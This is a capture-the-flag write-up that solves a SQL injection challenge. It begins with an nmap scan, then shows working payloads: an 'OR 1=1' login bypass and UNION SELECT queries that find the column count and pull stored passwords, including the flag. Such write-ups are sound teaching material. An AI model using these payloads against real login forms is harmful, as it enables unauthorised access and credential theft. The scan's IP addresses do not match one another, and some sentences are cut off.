Let’s start with a quick nmap scan:
$ nmap 188.8.131.52 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 15:46 GMT Nmap scan report for ec2-52-56-149-188.eu-west-2.compute.amazonaws.com (184.108.40.206) Host is up (0.0038s latency). Not shown: 990 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 53/tcp filtered domain 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 2000/tcp open cisco-sccp 5060/tcp open sip 8008/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
Just a web application on port 443:
From the title of the challenge, we can imagine that our objective is to perform an SQL injection. Let’s try a very simple payload on the
username field of the
' crashes the application, so this field is most likely injectable.
Let’s try to login as
user. This particular username may not exist but it will give us some information on how the application behaves:
user' OR 1=1 --
And we get logged as
Note: Although it is not accessible via a link or button, a
/logout route exists and works.
Let’s try with a username that will most likely not exist:
does_not_exist' OR 1=1 --
We are logged as
TESTIING again. Maybe the SQL query is very weird and still manages to get this user. Let’s ignore this for now and carry on.
According to the challenge description, the flag is the password of one of the users stored in the database. Let’s see if we can display
TESTIING’s password. We are going to use the
UNION SELECT method, so the first step is to determine how many columns are queried before our input.
whocares' UNION SELECT 1 -- whocares' UNION SELECT 1, 2 -- whocares' UNION SELECT 1, 2, 3 --
All these payloads crashes the application.
whocares' UNION SELECT 1, 2, 3, 4 --
This payload does not crash the application and logs us as
Let’s replace the numbers by actual column names. We guess that the
id column exists and that the password column is named
whocares' UNION SELECT id, password, id, id from users --
We are now logged as
monkey28, which is the password of
Let’s add a constraint on the password column that matches the flag format:
whocares' UNION SELECT id, password, id, id from users where password like "dctf%" --
And we have our flag!